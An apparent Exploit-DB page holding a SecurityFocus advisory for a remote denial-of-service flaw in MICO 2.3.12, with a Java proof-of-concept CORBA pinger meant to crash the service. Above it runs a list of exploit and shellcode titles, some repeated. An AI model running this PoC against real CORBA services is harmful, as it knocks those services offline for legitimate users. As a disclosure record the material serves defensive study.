
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
108 lines
No EOL
3.3 KiB
Java
108 lines
No EOL
3.3 KiB
Java
source: https://www.securityfocus.com/bid/18869/info
|
|
|
|
MICO is susceptible to a remote denial-of-service vulnerability. This issue is due to a failure of the application to properly handle unexpected input.
|
|
|
|
This issue allows remote attackers to crash affected applications, denying further service to legitimate users.
|
|
|
|
MICO versions 2.3.12RC3 and 2.3.12 are vulnerable to this issue; other versions may also be affected.
|
|
|
|
// $Id: JPing.java 8 2006-07-02 09:35:47Z tuergeist $
|
|
public class JPing {
|
|
static String[] myArgs;
|
|
|
|
private static void showHelp() {
|
|
System.err.println("YAOP - Yet another object pinger v0.1\n a JacORB pingo clone");
|
|
System.err.println("Usage: java JPing -p <IOR> [<TypeID>]");
|
|
System.err.println("Options:");
|
|
System.err.println("\t -p <IOR> \n\t\t pings an CORBA object" +
|
|
"\n\t\tYou can also use corbaloc instead of stringified IORs\n" +
|
|
"\t\te.g. corbaloc::127.0.0.1:1234/foobarfoofoo \n" +
|
|
"\t\tTypeID is optional e.g. IDL:Hello:1.0\n");
|
|
System.exit( 1 );
|
|
}
|
|
public static String[] getMyArgs() {
|
|
return myArgs;
|
|
}
|
|
|
|
public static void setMyArgs(String[] mArgs) {
|
|
myArgs = mArgs;
|
|
}
|
|
public static void main(String[] args) {
|
|
setMyArgs( args );
|
|
|
|
if( args.length<2 || args.length > 5 )
|
|
{
|
|
showHelp();
|
|
}
|
|
|
|
if (args[0].equalsIgnoreCase("-p")) {
|
|
pingObject();
|
|
return;
|
|
}
|
|
showHelp();
|
|
}
|
|
|
|
static void pingObject () {
|
|
String[] args = getMyArgs();
|
|
String type = new String();
|
|
org.omg.CORBA.ORB orb = org.omg.CORBA.ORB.init(args,null);
|
|
org.omg.CORBA.Object o= null;
|
|
String iorString = null;
|
|
|
|
|
|
if( args.length < 2 || args.length > 3)
|
|
{
|
|
showHelp();
|
|
}
|
|
iorString = args[1];
|
|
if (args.length==3) {
|
|
type = new String(args[2]); // TypeID
|
|
}
|
|
|
|
System.out.print("orb.string_to_object \t\t ... ");
|
|
try {
|
|
o = orb.string_to_object( iorString );
|
|
}
|
|
catch (Exception e) {
|
|
System.err.println("Exception caught; " + e.toString());
|
|
System.exit(1);
|
|
}
|
|
if( o == null )
|
|
{
|
|
System.err.println("Could not convert " + iorString + " to an object");
|
|
}
|
|
else
|
|
{
|
|
System.out.println("ok");
|
|
System.out.print("Object exists? " );
|
|
try
|
|
{
|
|
boolean exists = !o._non_existent();
|
|
System.out.println("\t\t\t ... " + exists);
|
|
if(exists && type.length()>8) {
|
|
System.out.print("Object is_a("+type+")");
|
|
System.out.println("\t ... " + o._is_a( type ) );
|
|
}
|
|
|
|
}
|
|
catch (org.omg.CORBA.OBJECT_NOT_EXIST e)
|
|
{
|
|
System.err.println("\t ... no!\n" + e );
|
|
}
|
|
catch (org.omg.CORBA.OBJ_ADAPTER e)
|
|
{
|
|
System.err.println("\nAdapter error!\n\n" + e );
|
|
}
|
|
catch (Exception e) {
|
|
System.err.println("Exception caught; " + e.toString());
|
|
}
|
|
/*
|
|
catch (org.omg.CORBA.SystemException e)
|
|
{
|
|
System.err.println("\nSystem Exception!\n\n" + e );
|
|
}
|
|
*/
|
|
}
|
|
return;
|
|
}
|
|
} |